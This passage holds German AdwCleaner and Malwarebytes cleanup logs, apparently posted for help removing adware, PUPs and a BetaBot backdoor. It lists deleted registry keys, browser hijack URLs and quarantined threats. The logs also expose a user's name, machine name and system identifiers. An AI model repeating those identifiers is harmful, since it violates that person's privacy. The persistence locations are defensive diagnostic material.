[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.bz2
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.cab
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.gz
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.gzip
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.iso
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.jar
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.lzh
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.rar
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.rpm
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.tar
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.tbz
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.tgz
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.wim
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.z
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\ZipTool.zip
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\AppID\{1C6F51F8-BCE6-4702-8952-6A8233359FBC}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\CLSID\{FF20459C-DA6E-41A7-80BC-8F4FEFD9C575}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\CLSID\{73F208F0-628E-4E2C-A8E5-E7A06B71AB01}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\CLSID\{735CBB11-3E26-4197-9B1D-8E26F2AE9E66}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\CLSID\{E3605470-291B-44EB-8648-745EE356599A}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\Interface\{CC8A7CCD-5D3D-4DE1-A658-63315C4CBCC4}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\Interface\{C8B797A0-024C-4D90-80F5-4CCC0988013A}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\TypeLib\{764C8270-3798-46F1-8ECE-23F531AF8CEE}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\TypeLib\{4511A7B0-96B2-47A7-84AB-FB76078EA007}
[-] Schl黶sel gel鰏cht: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FF20459C-DA6E-41A7-80BC-8F4FEFD9C575}
[-] Schl黶sel gel鰏cht: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E3605470-291B-44EB-8648-745EE356599A}
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\System Healer
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\b`nl{y
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\ompndb
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\jhdbca
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\jhtrsq
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\Interstatnogui
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\xvb`lj
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\SwytShop
[-] Schl黶sel gel鰏cht: HKU\.DEFAULT\Software\Genius
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\DownloadProtect
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Interstat
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\PRODUCTSETUP
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\PC
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Amigo
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\csastats
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\AutoTime
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Event Monitor
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\SNDA
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\{1f7ee1a8-4436-4ffc-b97b-b5b01e87d3d2}
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Junemike
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\MICROSOFT\wewewe
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\VideoBox
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\WiperSoft
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Hotspot
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\SpeeDownloader
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Speedownloader0099
[-] Schl黶sel gel鰏cht: HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\AppDataLow\Software\AppTrailers
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\System Healer
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\b`nl{y
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\ompndb
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\jhdbca
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\jhtrsq
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\Interstatnogui
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\xvb`lj
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\SwytShop
[#] Schl黶sel mit Neustart gel鰏cht: HKU\S-1-5-18\Software\Genius
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\DownloadProtect
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Interstat
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\PRODUCTSETUP
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\PC
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Amigo
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\csastats
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\AutoTime
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Event Monitor
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\SNDA
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Microsoft\{1f7ee1a8-4436-4ffc-b97b-b5b01e87d3d2}
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Junemike
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\MICROSOFT\wewewe
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\VideoBox
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\WiperSoft
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Hotspot
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\SpeeDownloader
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\Speedownloader0099
[#] Schl黶sel mit Neustart gel鰏cht: HKCU\Software\AppDataLow\Software\AppTrailers
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\hdcode
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Jawego
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\PC
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Event Monitor
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\OtherSearch
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\ScreenShot
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\b`nl{y
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Microsoft\{1f7ee1a8-4436-4ffc-b97b-b5b01e87d3d2}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\ompndb
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\jhdbca
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\amule-custom
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\EnigmaSoftwareGroup
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\jhtrsq
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Junemike
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\startpageing123Software
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\xvb`lj
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\msServer
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\{84416237-6490-494D-9AD6-4994DD978971}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Speedownloader0099
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\ourluckysitesSoftware
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\mbs_install
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\betterads
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\initialsite123Software
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpyHunter
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\DownloadProtect
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Interstat
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\PRODUCTSETUP
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\PC
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Amigo
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\csastats
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\AutoTime
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Event Monitor
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\SNDA
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Microsoft\{1f7ee1a8-4436-4ffc-b97b-b5b01e87d3d2}
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Junemike
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\MICROSOFT\wewewe
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\VideoBox
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\WiperSoft
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Hotspot
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\SpeeDownloader
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\Speedownloader0099
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKCU\Software\AppDataLow\Software\AppTrailers
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\SearchModule
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\b`nl{y
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\{1f7ee1a8-4436-4ffc-b97b-b5b01e87d3d2}
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\ompndb
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\jhdbca
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\HDWallpaper
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\EnigmaSoftwareGroup
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Socia2Sear
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\jhtrsq
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\xvb`lj
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Speedownloader0099
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\Installer\Features\F39E5917C417B4041A46F88010121C6E
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\Installer\Products\F39E5917C417B4041A46F88010121C6E
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F39E5917C417B4041A46F88010121C6E
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B68CE107A2DED706DC47D6BC4BF3C4C1
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9C767D9D7BB3F9C4B839FF09B6C80DCF
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4EE2F0310EBEC29A0C48C035C43786AA
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4B2A47D6F1D42DD81A292C027724D291
[-] Schl黶sel gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02C076B2283AB74D88D5E4D34BC497FF
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F39E5917C417B4041A46F88010121C6E
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\Installer\Features\F39E5917C417B4041A46F88010121C6E
[#] Schl黶sel mit Neustart gel鰏cht: [x64] HKLM\SOFTWARE\Classes\Installer\Products\F39E5917C417B4041A46F88010121C6E
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
[#] Schl黶sel mit Neustart gel鰏cht: HKLM\SOFTWARE\Microsoft\{1f7ee1a8-4436-4ffc-b97b-b5b01e87d3d2}
[-] Schl黶sel gel鰏cht: HKLM\SOFTWARE\Classes\AppID\QZipShell.DLL
[-] Wert gel鰏cht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
[-] Wert gel鰏cht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [Kitty]
[-] Wert gel鰏cht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [BIT]
[-] Wert gel鰏cht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [3DM]


***** [ Browser ] *****

[-] Firefox Einstellungen bereinigt: "browser.search.searchengine.hp" -  "hxxp://www.initialsite123.com/?z=f1b5038898decb600b47077g1z9tfqae8b9m2tfz7w&from=icb&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&type=hp"
[-] Firefox Einstellungen bereinigt: "browser.search.searchengine.sp" -  "hxxp://www.initialsite123.com/search/?from=icb&q={searchTerms}&type=sp&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&z=f1b5038898decb600b47077g1z9tfqae8b9m2tfz7w"
[-] Firefox Einstellungen bereinigt: "browser.search.searchengine.url" -  "hxxp://www.initialsite123.com/search/?from=icb&q={searchTerms}&type=sp&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&z=f1b5038898decb600b47077g1z9tfqae8b9m2tfz7w"
[-] [C:\Users\Nick Schuster\AppData\Local\Chromium\User Data\Default] [startup_urls] Gel鰏cht: hxxps://de.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D7%26b%3Dchmm%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1
[-] [C:\Users\Nick Schuster\AppData\Local\Chromium\User Data\Default] [homepage] Gel鰏cht: hxxps://de.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D1%26b%3Dchmm%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1


*************************

:: "Tracing" Schl黶sel gel鰏cht
:: Winsock Einstellungen zur點kgesetzt
:: "Image File Execution Options" Schl黶sel gel鰏cht
:: "Prefetch" Dateien gel鰏cht
:: Proxy Einstellungen zur點kgesetzt
:: Firewall Einstellungen zur點kgesetzt
:: Internet Explorer Richtlinien gel鰏cht
:: Chrome Richtlinien gel鰏cht
:: Hosts-Datei wiederhergestellt

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [33556 Bytes] - [05/06/2017 15:51:50]
C:\AdwCleaner\AdwCleaner[S0].txt - [29191 Bytes] - [05/06/2017 15:50:23]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [33704 Bytes] ##########
         
--- --- ---

[/CODE]

Code:
ATTFilter
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 05.06.17
Scan-Zeit: 15:58
Protokolldatei: mbam.txt
Administrator: Ja

-Softwaredaten-
Version: 3.1.2.1733
Komponentenversion: 1.0.139
Version des Aktualisierungspakets: 1.0.2089
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 8.1
CPU: x64
Dateisystem: NTFS
Benutzer: RAZERLAP\Nick Schuster

-Scan-躡ersicht-
Scan-Typ: Bedrohungs-Scan
Ergebnis: Abgeschlossen
Gescannte Objekte: 594372
Erkannte Bedrohungen: 77
In die Quarant鋘e verschobene Bedrohungen: 77
Abgelaufene Zeit: 53 Min., 54 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

-Scan-Details-
Prozess: 0
(keine b鰏artigen Elemente erkannt)

Modul: 0
(keine b鰏artigen Elemente erkannt)

Registrierungsschl黶sel: 15
PUP.Optional.YouTubeAdBlock, HKLM\SOFTWARE\CLASSES\CLSID\{E3605470-291B-44EB-8648-745EE356599A}, L鰏chen bei Neustart, [309], [382053],1.0.2089
PUP.Optional.NeoBar, HKLM\SOFTWARE\CLASSES\CLSID\{FF20459C-DA6E-41A7-80BC-8F4FEFD9C575}, L鰏chen bei Neustart, [149], [169807],1.0.2089
Backdoor.BetaBot.MSIL, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\WEYUM79GYKI7U.EXE, L鰏chen bei Neustart, [4794], [378613],1.0.2089
Backdoor.BetaBot.MSIL, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\WEYUM79GYKI7U.EXE, L鰏chen bei Neustart, [4794], [378613],1.0.2089
PUP.Optional.SwytShop, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SwytShopAlgoadChrome_Pkg3a_is1, L鰏chen bei Neustart, [3131], [386986],1.0.2089
PUP.Optional.InterStat, HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\APPLICATIONS\interstat.exe, L鰏chen bei Neustart, [1407], [261503],1.0.2089
Adware.Ghokswa, HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Applemy, L鰏chen bei Neustart, [326], [403905],1.0.2089
PUP.Optional.Plumbytes, HKLM\SOFTWARE\Plumbytes Software, L鰏chen bei Neustart, [9063], [262040],1.0.2089
PUP.Optional.ByteFence, HKLM\SOFTWARE\MICROSOFT\TRACING\ByteFence_RASAPI32, L鰏chen bei Neustart, [631], [389038],1.0.2089
PUP.Optional.ByteFence, HKLM\SOFTWARE\MICROSOFT\TRACING\ByteFence_RASMANCS, L鰏chen bei Neustart, [631], [389038],1.0.2089
Adware.Elex.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{F566FB96-67A4-4E6C-B262-2AE76A61F74F}, L鰏chen bei Neustart, [1107], [391386],1.0.2089
PUP.Optional.Plumbytes, HKLM\SOFTWARE\MICROSOFT\TRACING\Plumbytes_RASAPI32, L鰏chen bei Neustart, [9063], [396951],1.0.2089
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{575f1242}, L鰏chen bei Neustart, [28], [260250],1.0.2089
PUP.Optional.Plumbytes, HKLM\SOFTWARE\MICROSOFT\TRACING\Plumbytes_RASMANCS, L鰏chen bei Neustart, [9063], [396951],1.0.2089
PUP.Optional.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\gplyra, L鰏chen bei Neustart, [197], [317317],1.0.2089

Registrierungswert: 3
Adware.Elex.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{F566FB96-67A4-4E6C-B262-2AE76A61F74F}|DISPLAYNAME, L鰏chen bei Neustart, [1107], [391386],1.0.2089
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{575f1242}|1, L鰏chen bei Neustart, [28], [260250],1.0.2089
PUP.Optional.Kuaizip, HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.bin\OPENWITHPROGIDS|KUAIZIPMOUNT.BIN, L鰏chen bei Neustart, [1141], [392706],1.0.2089

Registrierungsdaten: 7
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|DhcpNameServer, Ersetzen bei Neustart, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{04A2521B-7C11-484A-B28D-E9BE3102A821}|NameServer, Ersetzen bei Neustart, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}|NameServer, Ersetzen bei Neustart, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}|NameServer, Ersetzen bei Neustart, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}|DhcpNameServer, Ersetzen bei Neustart, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}|DhcpNameServer, Ersetzen bei Neustart, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{D14F6D89-FA6F-4917-80C9-3F09BF6A6D5D}|NameServer, Ersetzen bei Neustart, [28], [-1],0.0.0

Daten-Stream: 0
(keine b鰏artigen Elemente erkannt)

Ordner: 17
Backdoor.BetaBot.MSIL, C:\PROGRAMDATA\Google Updater 2.0, L鰏chen bei Neustart, [4794], [378613],1.0.2089
PUP.Optional.SwytShop, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\Programs\SwytShopAlgoadChrome_Pkg3a, L鰏chen bei Neustart, [3131], [386986],1.0.2089
PUP.Optional.xRocketToolbar, C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\5f8d7llm.default\extensions\arthurj8283@gmail.com\chrome\content, L鰏chen bei Neustart, [12704], [180553],1.0.2089
PUP.Optional.xRocketToolbar, C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\5f8d7llm.default\extensions\arthurj8283@gmail.com\chrome\skin, L鰏chen bei Neustart, [12704], [180553],1.0.2089
PUP.Optional.xRocketToolbar, C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\5f8d7llm.default\extensions\arthurj8283@gmail.com\chrome, L鰏chen bei Neustart, [12704], [180553],1.0.2089
PUP.Optional.xRocketToolbar, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\EXTENSIONS\ARTHURJ8283@GMAIL.COM, L鰏chen bei Neustart, [12704], [180553],1.0.2089
PUP.Optional.InternetMonitor, C:\Users\Nick Schuster\AppData\Local\CrashRpt\UnsentCrashReports\BandwidthStat_389\Logs, L鰏chen bei Neustart, [12910], [182462],1.0.2089
PUP.Optional.InternetMonitor, C:\USERS\NICK SCHUSTER\APPDATA\LOCAL\CRASHRPT\UNSENTCRASHREPORTS\BandwidthStat_389, L鰏chen bei Neustart, [12910], [182462],1.0.2089
PUP.Optional.FastSearch, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\EXTENSIONS\AMCONTEXTMENU@LOUCYPHER, L鰏chen bei Neustart, [1144], [329326],1.0.2089
PUP.Optional.InterStat, C:\Users\Nick Schuster\AppData\Local\CrashRpt\UnsentCrashReports\Interstatnogui_389\Logs, L鰏chen bei Neustart, [1407], [373566],1.0.2089
PUP.Optional.InterStat, C:\USERS\NICK SCHUSTER\APPDATA\LOCAL\CRASHRPT\UNSENTCRASHREPORTS\Interstatnogui_389, L鰏chen bei Neustart, [1407], [373566],1.0.2089
PUP.Optional.InterStat, C:\Users\Nick Schuster\AppData\Local\CrashRpt\UnsentCrashReports\Interstatnogui_390\Logs, L鰏chen bei Neustart, [1407], [373566],1.0.2089
PUP.Optional.InterStat, C:\USERS\NICK SCHUSTER\APPDATA\LOCAL\CRASHRPT\UNSENTCRASHREPORTS\Interstatnogui_390, L鰏chen bei Neustart, [1407], [373566],1.0.2089
